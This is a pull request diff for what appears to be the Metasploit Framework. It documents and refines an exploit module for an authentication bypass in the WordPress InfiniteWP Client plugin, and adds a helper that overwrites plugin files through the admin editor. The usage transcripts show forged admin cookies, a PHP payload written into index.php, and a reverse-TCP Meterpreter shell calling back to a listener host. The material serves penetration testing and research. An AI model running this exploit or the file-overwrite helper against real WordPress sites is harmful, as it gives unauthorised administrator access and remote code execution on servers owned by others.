### PR TITLE
Add WordPress InfiniteWP Client plugin exploit, enhance WordPress mixin with plugin editing, and add AutoCheck mixin

### DIFF
--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -2,7 +2,14 @@
 
 This module exploits an authentication bypass in the WordPress
 InfiniteWP Client plugin to log in as an administrator and execute
-arbitrary PHP code. A valid administrator username is required.
+arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
+
+The module will attempt to retrieve the original `PLUGIN_FILE` contents
+and restore them after payload execution. If `VerifyContents` is set,
+which is the default setting, the module will check to see if the
+restored contents match the original.
+
+Note that a valid administrator username is required for this module.
 
 ## Setup
 
@@ -19,11 +26,22 @@ Id  Name
 
 ## Options
 
+**USERNAME**
+
+Set this to a known, valid administrator username. Authentication will
+be bypassed for this user.
+
 **PLUGIN_FILE**
 
 Set this to a plugin file to insert the payload into, relative to the
 plugins directory, which is normally `/wp-content/plugins`. The file
-must exist and be writable by the web user. It will be overwritten.
+must exist and be writable by the web user. It will be overwritten and
+later restored.
+
+**VerifyContents**
+
+Verify that the restored contents of `PLUGIN_FILE` match the original.
+This is the default setting.
 
 ## Usage
 
@@ -34,20 +52,29 @@ msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
 [*] Found version 1.9.4.4 in the custom file
 [*] Bypassing auth for admin at http://127.0.0.1:8080/
 [+] Successfully obtained cookie for admin
-[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C9c1dd6506b08207bd81ee38a4cf7c9a0260ff7bbf4aec52d1a8ebd32a4d2f47e; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C9a91c6c80d74d0836ed69e55de3aab4a13e003f2004a982c0997cc46b8b80226;
-[*] Editing payload into /wp-content/plugins/index.php
-[*] Acquired a plugin edit nonce: 8586e26cd9
+[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C44ecac44335ad633ea98045a7085c4947fee015b700b8b7d9463dd44d2388bb2; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C240d956e7a43f2ed3193171df429c8a8fb9ba3bac2f9805cdf88789f90a186df;
+[*] Retrieving original contents of /wp-content/plugins/index.php
+[+] Successfully retrieved original contents of /wp-content/plugins/index.php
+[*] Contents:
+<?php
+// Silence is golden.
+[*] Overwriting /wp-content/plugins/index.php with payload
+[*] Acquired a plugin edit nonce: 9901ed8f55
 [*] Edited plugin file index.php
-[+] Successfully edited payload into /wp-content/plugins/index.php
+[+] Successfully overwrote /wp-content/plugins/index.php with payload
 [*] Requesting payload at /wp-content/plugins/index.php
+[*] Restoring original contents of /wp-content/plugins/index.php
 [*] Sending stage (38288 bytes) to 192.168.56.1
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:49273) at 2020-01-17 19:51:27 -0600
+[*] Acquired a plugin edit nonce: 9901ed8f55
+[*] Edited plugin file index.php
+[+] Current contents of /wp-content/plugins/index.php match original!
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58534) at 2020-01-18 14:50:39 -0600
 
 meterpreter > getuid
 Server username: www-data (33)
 meterpreter > sysinfo
-Computer    : 4d173f97f00b
-OS          : Linux 4d173f97f00b 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Computer    : 4e8791809581
+OS          : Linux 4e8791809581 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
 Meterpreter : php/linux
 meterpreter >
 ```

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -83,29 +83,30 @@ msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
 [*] Found version 1.9.4.4 in the custom file
 [*] Bypassing auth for admin at http://127.0.0.1:8080/
 [+] Successfully obtained cookie for admin
-[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C44ecac44335ad633ea98045a7085c4947fee015b700b8b7d9463dd44d2388bb2; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C240d956e7a43f2ed3193171df429c8a8fb9ba3bac2f9805cdf88789f90a186df;
+[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C066e08465b4fcf95f8562a65d25338f7e09f18832c583d4f5960f7cb9ba0a0b8; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C066e08465b4fcf95f8562a65d25338f7e09f18832c583d4f5960f7cb9ba0a0b8; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C33df9b73b0ea9ea85f521c28848f9118bb62862418ae306d2ff14732011e5681; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C3db5cc0c5d78db233519a12afb40d3b23d96c70ee956cad6f5a72c5a5d05e3aa; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C3db5cc0c5d78db233519a12afb40d3b23d96c70ee956cad6f5a72c5a5d05e3aa; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C004c44e308040800a0b986f233011ac1c7a5c05dcd1561db44bb2514b2fcc332;
+[+] Successfully logged in as admin
 [*] Retrieving original contents of /wp-content/plugins/index.php
 [+] Successfully retrieved original contents of /wp-content/plugins/index.php
 [*] Contents:
 <?php
 // Silence is golden.
 [*] Overwriting /wp-content/plugins/index.php with payload
-[*] Acquired a plugin edit nonce: 9901ed8f55
+[*] Acquired a plugin edit nonce: ebb5a2b07f
 [*] Edited plugin file index.php
 [+] Successfully overwrote /wp-content/plugins/index.php with payload
 [*] Requesting payload at /wp-content/plugins/index.php
 [*] Restoring original contents of /wp-content/plugins/index.php
 [*] Sending stage (38288 bytes) to 192.168.56.1
-[*] Acquired a plugin edit nonce: 9901ed8f55
+[*] Acquired a plugin edit nonce: ebb5a2b07f
 [*] Edited plugin file index.php
 [+] Current contents of /wp-content/plugins/index.php match original!
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58534) at 2020-01-18 14:50:39 -0600
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:64787) at 2020-02-07 01:18:27 -0600
 
 meterpreter > getuid
 Server username: www-data (33)
 meterpreter > sysinfo
-Computer    : 4e8791809581
-OS          : Linux 4e8791809581 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Computer    : 2c991a571915
+OS          : Linux 2c991a571915 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
 Meterpreter : php/linux
 meterpreter >
 ```

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -13,9 +13,11 @@ restored contents match the original.
 
 Note that a valid administrator username is required for this module.
 
+**WARNING:** WordPress 5.x is currently not supported. Tested against 4.x.
+
 ### Setup
 
-1. Install WordPress
+1. Install WordPress 4.x **(5.x is currently not supported)**
 2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
 3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
 

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -1,0 +1,53 @@
+## Introduction
+
+This module exploits an authentication bypass in the WordPress
+InfiniteWP Client plugin to log in as an administrator and execute
+arbitrary PHP code. A valid administrator username is required.
+
+## Setup
+
+Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+and follow <https://wordpress.org/plugins/iwp-client/#installation>.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   InfiniteWP Client < 1.9.4.5
+```
+
+## Options
+
+**PLUGIN_FILE**
+
+Set this to a plugin file to insert the payload into, relative to the
+plugins directory, which is normally `/wp-content/plugins`. The file
+must exist and be writable by the web user. It will be overwritten.
+
+## Usage
+
+```
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Found version 1.9.4.4 in the custom file
+[*] Bypassing auth for admin at http://127.0.0.1:8080/
+[+] Successfully obtained cookie for admin
+[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C9c1dd6506b08207bd81ee38a4cf7c9a0260ff7bbf4aec52d1a8ebd32a4d2f47e; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C9a91c6c80d74d0836ed69e55de3aab4a13e003f2004a982c0997cc46b8b80226;
+[*] Editing payload into /wp-content/plugins/index.php
+[*] Acquired a plugin edit nonce: 8586e26cd9
+[*] Edited plugin file index.php
+[+] Successfully edited payload into /wp-content/plugins/index.php
+[*] Requesting payload at /wp-content/plugins/index.php
+[*] Sending stage (38288 bytes) to 192.168.56.1
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:49273) at 2020-01-17 19:51:27 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 4d173f97f00b
+OS          : Linux 4d173f97f00b 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -13,11 +13,12 @@ restored contents match the original.
 
 Note that a valid administrator username is required for this module.
 
-**WARNING:** WordPress 5.x is currently not supported. Tested against 4.x.
+WordPress >= 4.9 is currently not supported due to a breaking WordPress
+API change. Tested against 4.8.3.
 
 ### Setup
 
-1. Install WordPress 4.x **(5.x is currently not supported)**
+1. Install WordPress 4.8.3 or older
 2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
 3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
 
@@ -54,7 +55,7 @@ This is the default setting.
 
 ## Scenarios
 
-### InfiniteWP Client 1.9.4.4
+### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3
 
 ```
 msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
@@ -75,17 +76,20 @@ Payload options (php/meterpreter/reverse_tcp):
 
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8080
-rport => 8080
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
+rport => 8000
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
 lhost => 192.168.56.1
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
 
 [*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] WordPress 4.8.3 is a supported target
 [*] Found version 1.9.4.4 in the custom file
-[*] Bypassing auth for admin at http://127.0.0.1:8080/
+[+] The target appears to be vulnerable.
+[*] Bypassing auth for admin at http://127.0.0.1:8000/
 [+] Successfully obtained cookie for admin
-[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C066e08465b4fcf95f8562a65d25338f7e09f18832c583d4f5960f7cb9ba0a0b8; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C066e08465b4fcf95f8562a65d25338f7e09f18832c583d4f5960f7cb9ba0a0b8; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CF8scWg5ll4PTVNpRx9Ye4ACXAFiICxpezmukJrU5Izb%7C33df9b73b0ea9ea85f521c28848f9118bb62862418ae306d2ff14732011e5681; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C3db5cc0c5d78db233519a12afb40d3b23d96c70ee956cad6f5a72c5a5d05e3aa; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C3db5cc0c5d78db233519a12afb40d3b23d96c70ee956cad6f5a72c5a5d05e3aa; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1581232705%7CTzi0VghEMcaH7twJkibB54wx4OXJ1VwGwOvuwHl1zIR%7C004c44e308040800a0b986f233011ac1c7a5c05dcd1561db44bb2514b2fcc332;
+[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
 [+] Successfully logged in as admin
 [*] Retrieving original contents of /wp-content/plugins/index.php
 [+] Successfully retrieved original contents of /wp-content/plugins/index.php
@@ -93,22 +97,22 @@ msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
 <?php
 // Silence is golden.
 [*] Overwriting /wp-content/plugins/index.php with payload
-[*] Acquired a plugin edit nonce: ebb5a2b07f
+[*] Acquired a plugin edit nonce: 74cde501ca
 [*] Edited plugin file index.php
 [+] Successfully overwrote /wp-content/plugins/index.php with payload
 [*] Requesting payload at /wp-content/plugins/index.php
 [*] Restoring original contents of /wp-content/plugins/index.php
 [*] Sending stage (38288 bytes) to 192.168.56.1
-[*] Acquired a plugin edit nonce: ebb5a2b07f
+[*] Acquired a plugin edit nonce: 74cde501ca
 [*] Edited plugin file index.php
 [+] Current contents of /wp-content/plugins/index.php match original!
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:64787) at 2020-02-07 01:18:27 -0600
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600
 
 meterpreter > getuid
 Server username: www-data (33)
 meterpreter > sysinfo
-Computer    : 2c991a571915
-OS          : Linux 2c991a571915 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Computer    : c7f8fbe7b083
+OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
 Meterpreter : php/linux
 meterpreter >
 ```

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -1,5 +1,7 @@
 ## Vulnerable Application
 
+### Description
+
 This module exploits an authentication bypass in the WordPress
 InfiniteWP Client plugin to log in as an administrator and execute
 arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -15,8 +15,9 @@ Note that a valid administrator username is required for this module.
 
 ### Setup
 
-Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
-and follow <https://wordpress.org/plugins/iwp-client/#installation>.
+1. Install WordPress
+2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
 
 ### Targets
 
@@ -28,10 +29,7 @@ Id  Name
 
 ## Verification Steps
 
-1. `git clone https://github.com/vulhub/vulhub`
-2. `cd vulhub/wordpress/pwnscriptum`
-3. `docker-compose up -d`
-4. Follow [Setup](#setup)
+Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ## Options
 
@@ -57,6 +55,28 @@ This is the default setting.
 ### InfiniteWP Client 1.9.4.4
 
 ```
+msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+
+Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8080
+rport => 8080
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
 
 [*] Started reverse TCP handler on 192.168.56.1:4444

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -26,6 +26,13 @@ Id  Name
 0   InfiniteWP Client < 1.9.4.5
 ```
 
+## Verification Steps
+
+1. `git clone https://github.com/vulhub/vulhub`
+2. `cd vulhub/wordpress/pwnscriptum`
+3. `docker-compose up -d`
+4. Follow [Setup](#setup)
+
 ## Options
 
 **USERNAME**

--- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 
 This module exploits an authentication bypass in the WordPress
 InfiniteWP Client plugin to log in as an administrator and execute
@@ -11,12 +11,12 @@ restored contents match the original.
 
 Note that a valid administrator username is required for this module.
 
-## Setup
+### Setup
 
 Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
 and follow <https://wordpress.org/plugins/iwp-client/#installation>.
 
-## Targets
+### Targets
 
 ```
 Id  Name
@@ -43,7 +43,9 @@ later restored.
 Verify that the restored contents of `PLUGIN_FILE` match the original.
 This is the default setting.
 
-## Usage
+## Scenarios
+
+### InfiniteWP Client 1.9.4.4
 
 ```
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run

--- a/lib/msf/core/exploit/auto_check.rb
+++ b/lib/msf/core/exploit/auto_check.rb
@@ -1,0 +1,46 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for automatic check (formerly ForceExploit)
+#
+
+module Msf
+module Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options([
+      OptBool.new('AutoCheck', [false, 'Run check before exploitation', true])
+    ])
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      print_warning('AutoCheck is disabled. Proceeding with exploitation.')
+      return
+    end
+
+    print_status('Executing automatic check (disable AutoCheck to override)')
+
+    checkcode = check
+
+    checkcode_error = checkcode.message + '. Disable AutoCheck to override.'
+
+    # This isn't even my final form!
+    case checkcode
+    when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears
+      print_good(checkcode.message)
+    when Exploit::CheckCode::Detected
+      print_warning(checkcode.message)
+    when Exploit::CheckCode::Safe
+      fail_with(Module::Failure::NotVulnerable, checkcode_error)
+    when Exploit::CheckCode::Unsupported
+      fail_with(Module::Failure::BadConfig, checkcode_error)
+    else
+      fail_with(Module::Failure::Unknown, checkcode_error)
+    end
+  end
+
+end
+end

--- a/lib/msf/core/exploit/http/wordpress/admin.rb
+++ b/lib/msf/core/exploit/http/wordpress/admin.rb
@@ -40,4 +40,46 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
       return false
     end
   end
+
+  # Edits a plugin file (relative to plugins dir) using a valid admin session.
+  #
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @param content [String] The plugin file content as a string (OVERWRITES!)
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_edit_plugin(file, content, cookie)
+    unless (nonce = wordpress_helper_get_plugin_edit_nonce(cookie, file))
+      vprint_error('Failed to acquire the plugin edit nonce')
+      return false
+    end
+
+    vprint_status("Acquired a plugin edit nonce: #{nonce}")
+
+    editor_uri = normalize_uri(
+      wordpress_url_backend,
+      "plugin-editor.php?file=#{file}" # Can't use vars_get for this
+    )
+
+    # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php
+    res = send_request_cgi(
+      'method'       => 'POST',
+      'uri'          => editor_uri,
+      'cookie'       => cookie,
+      'vars_post'    => {
+        '_wpnonce'   => nonce,
+        'file'       => file,
+        'action'     => 'update',
+        'newcontent' => content
+      }
+    )
+
+    unless res && res.redirect? && res.redirection.to_s.include?(editor_uri)
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    vprint_status("Edited plugin file #{file}")
+    true
+  end
 end

--- a/lib/msf/core/exploit/http/wordpress/admin.rb
+++ b/lib/msf/core/exploit/http/wordpress/admin.rb
@@ -44,10 +44,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
   # Edits a plugin file (relative to plugins dir) using a valid admin session.
   #
   # @param file [String] The plugin file to edit (relative to plugins dir)
-  # @param content [String] The plugin file content as a string (OVERWRITES!)
+  # @param contents [String] The plugin file contents to overwrite with
   # @param cookie [String] A valid admin session cookie
   # @return [Boolean] true on success, false on error
-  def wordpress_edit_plugin(file, content, cookie)
+  def wordpress_edit_plugin(file, contents, cookie)
     unless (nonce = wordpress_helper_get_plugin_edit_nonce(cookie, file))
       vprint_error('Failed to acquire the plugin edit nonce')
       return false
@@ -69,7 +69,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
         '_wpnonce'   => nonce,
         'file'       => file,
         'action'     => 'update',
-        'newcontent' => content
+        'newcontent' => contents
       }
     )
 

--- a/lib/msf/core/exploit/http/wordpress/admin.rb
+++ b/lib/msf/core/exploit/http/wordpress/admin.rb
@@ -55,25 +55,33 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
 
     vprint_status("Acquired a plugin edit nonce: #{nonce}")
 
-    editor_uri = normalize_uri(
-      wordpress_url_backend,
-      "plugin-editor.php?file=#{file}" # Can't use vars_get for this
-    )
-
     # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php
     res = send_request_cgi(
       'method'       => 'POST',
-      'uri'          => editor_uri,
+      'uri'          => wordpress_url_admin_plugin_editor,
       'cookie'       => cookie,
       'vars_post'    => {
+        'action'     => 'update',
         '_wpnonce'   => nonce,
         'file'       => file,
-        'action'     => 'update',
         'newcontent' => contents
       }
     )
 
-    unless res && res.redirect? && res.redirection.to_s.include?(editor_uri)
+    unless res && res.redirect?
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    # NOTE: send_request_cgi! doesn't change the method
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => res.redirection.to_s,
+      'cookie' => cookie
+    )
+
+    unless res && res.code == 200 && res.body.include?('edited successfully')
       vprint_error("Server responded with code #{res.code}") if res
       vprint_error("Failed to edit plugin file #{file}")
       return false

